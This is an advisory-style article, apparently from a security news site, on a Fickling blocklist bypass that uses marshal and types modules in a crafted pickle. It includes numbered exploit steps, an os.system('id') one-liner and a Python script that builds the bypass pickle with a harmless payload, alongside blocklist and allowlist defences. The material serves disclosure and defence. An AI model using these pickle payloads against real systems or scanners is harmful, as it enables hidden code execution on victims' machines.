The vulnerability is a detection bypass in Fickling, the static analysis tool for Python pickle files. Pickle is not a passive data format: a pickle can import any module and call any callable while it is being deserialized, which is how a malicious file executes arbitrary code. Fickling flags such files by checking the modules a pickle imports against a blocklist of known-dangerous ones (`os`, `subprocess` and the like; `os.system` is the classic payload). This bypass worked because the `marshal` and `types` modules were missing from that blocklist. An attacker can craft a pickle that calls `marshal.loads()` on an embedded byte string to rebuild a code object, then calls `types.FunctionType()` to wrap that code object into a callable and invokes it. Nothing on the blocklist is ever imported, so Fickling's static analysis did not recognise these imports as dangerous and labelled the file "LIKELY_SAFE". Separately, malformed pickles could cause a stack exhaustion crash in the interpreter; that is a denial-of-service issue rather than a code-execution one. The core security failure was the incomplete blocklist: every import not on the list was treated as harmless, so a single omission was enough to hide code execution.
Platform: Fickling
Version: Prior to PR186
Vulnerability: Unsafe module blocklist bypass
Severity: Critical
Date: Report published 2023
Prediction: 2023-10-15
What Undercode Say:
`fickling -s malicious.pickle`
`python3 -c "import pickle, marshal, types; payload = marshal.dumps((lambda: __import__('os').system('id')).__code__); data = b'''(…pickle ops…)'''; pickle.loads(data)"`
`cat safety_result.json | grep severity`
How Exploit:
1. Attacker marshals a code object (`marshal.dumps()` of a function's `__code__`) and embeds the bytes in a pickle that calls `marshal.loads()` on them; the bytecode must be built for the victim's CPython version, since marshal output is version-specific.
2. The pickle then calls `types.FunctionType()` on the resulting code object to create a callable and invokes it, all through REDUCE opcodes, without importing any blocklisted module such as `os` or `subprocess`.
3. Victim runs Fickling on the file and gets a false 'LIKELY_SAFE' verdict, because neither `marshal` nor `types` is on the blocklist.
4. Victim unpickles the file and the embedded code runs with the privileges of the unpickling process.
Protection from this CVE
Update Fickling to a release that includes PR186, which adds the missing modules to the blocklist.
Never unpickle data from an untrusted source; pickle is a code-execution format, and a scanner's 'LIKELY_SAFE' verdict is evidence, not a guarantee.
Prefer allowlist-based checks (only named modules and attributes may be imported, for example by overriding `Unpickler.find_class`) over blocklists, which fail open whenever a dangerous module is missing from the list.
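The following Python script is added here as a worked example; it is not code from the Fickling project or from the original report. It hand-assembles the marshal/types pickle from the exploit steps above (with a harmless payload that just returns a string in place of `os.system`), lists the imports a static opcode scan sees, and shows why a blocklist misses the file while an allowlist, applied both as a scan and inside `Unpickler.find_class`, catches it. The `NAIVE_BLOCKLIST` and `ALLOWLIST` contents are assumptions for the example, not Fickling's actual lists.

```python
import io
import marshal
import pickle
import pickletools


def benign_payload():
    # Stand-in for the attacker's function (constructed for this example); a real
    # payload would be something like lambda: __import__("os").system("id").
    return "payload ran"


def _global(module, name):
    # GLOBAL opcode: b"c" + "module\nname\n", the import a static scanner must notice.
    return pickle.GLOBAL + module.encode() + b"\n" + name.encode() + b"\n"


def build_marshal_pickle(code_bytes):
    # Hand-assembled bypass pickle from the exploit steps, equivalent to
    # types.FunctionType(marshal.loads(code_bytes), {})(). No blocklisted module
    # (os, subprocess, ...) is imported, only marshal and types.
    return (
        pickle.PROTO + b"\x03"
        + _global("types", "FunctionType")    # stack: [FunctionType]
        + pickle.MARK + _global("marshal", "loads") + pickle.MARK
        + pickle.BINBYTES + len(code_bytes).to_bytes(4, "little") + code_bytes
        + pickle.TUPLE + pickle.REDUCE        # marshal.loads(code_bytes) -> code object
        + pickle.EMPTY_DICT                   # empty globals dict for the new function
        + pickle.TUPLE + pickle.REDUCE        # FunctionType(code, {}) -> function
        + pickle.EMPTY_TUPLE + pickle.REDUCE  # function() -> the payload runs
        + pickle.STOP
    )


def demo_bypass_pickle():
    # marshal output only loads on the CPython version that produced it, so an
    # attacker must build the payload for the victim's interpreter version.
    return build_marshal_pickle(marshal.dumps(benign_payload.__code__))


def build_classic_pickle(command):
    # The textbook os.system pickle, built here for scanning only: never load it.
    return (
        pickle.PROTO + b"\x03" + _global("os", "system") + pickle.MARK
        + pickle.BINUNICODE + len(command).to_bytes(4, "little") + command.encode()
        + pickle.TUPLE + pickle.REDUCE + pickle.STOP
    )


def imported_globals(data):
    # Static pass over the opcodes, executing nothing: every (module, name) the
    # pickle imports via GLOBAL (protocol <= 3) or STACK_GLOBAL (protocol 4+).
    found, strings = [], []
    for op, arg, _ in pickletools.genops(data):
        if op.name == "GLOBAL":
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":       # module and name were pushed as strings
            found.append((strings[-2], strings[-1]))   # (memo references not tracked here)
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return found


# Illustrative blocklist of the kind the article describes: an assumption for this
# example, not Fickling's real list; like the vulnerable version it lacks marshal and types.
NAIVE_BLOCKLIST = {"os", "posix", "nt", "subprocess", "sys", "builtins", "__builtin__", "socket"}

# Allowlist for the inverse approach, also an assumption: only what plain data needs.
ALLOWLIST = {"collections", "datetime"}


def blocklist_findings(data):
    # Imported modules that are on the blocklist; empty reads as 'LIKELY_SAFE'.
    return {m for m, _ in imported_globals(data)} & NAIVE_BLOCKLIST


def allowlist_findings(data):
    # Imported modules that are NOT on the allowlist; empty means acceptable.
    return {m for m, _ in imported_globals(data)} - ALLOWLIST


class AllowlistUnpickler(pickle.Unpickler):
    # Enforce the allowlist at load time: an import outside it aborts before any REDUCE.
    def find_class(self, module, name):
        if module in ALLOWLIST:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def stock_loads(data):
    return pickle.loads(data)   # what the victim does after a 'LIKELY_SAFE' verdict


def restricted_loads(data):
    # Returns the object, or the refusal message when the allowlist blocks an import.
    try:
        return AllowlistUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return str(exc)
```

Running `stock_loads(demo_bypass_pickle())` returns `"payload ran"`, `blocklist_findings` on the same bytes is empty (the blocklist verdict the article describes), while `allowlist_findings` reports `{"types", "marshal"}` and `restricted_loads` refuses at the very first import. The classic `os.system` pickle is caught by both approaches; build it for scanning only and never pass it to `pickle.loads`. Keep `marshal.dumps` and `pickle.loads` on the same CPython version, because marshal bytecode does not load across versions.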
Impact:
Arbitrary code execution.
Security tool bypass.
Potential system compromise.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

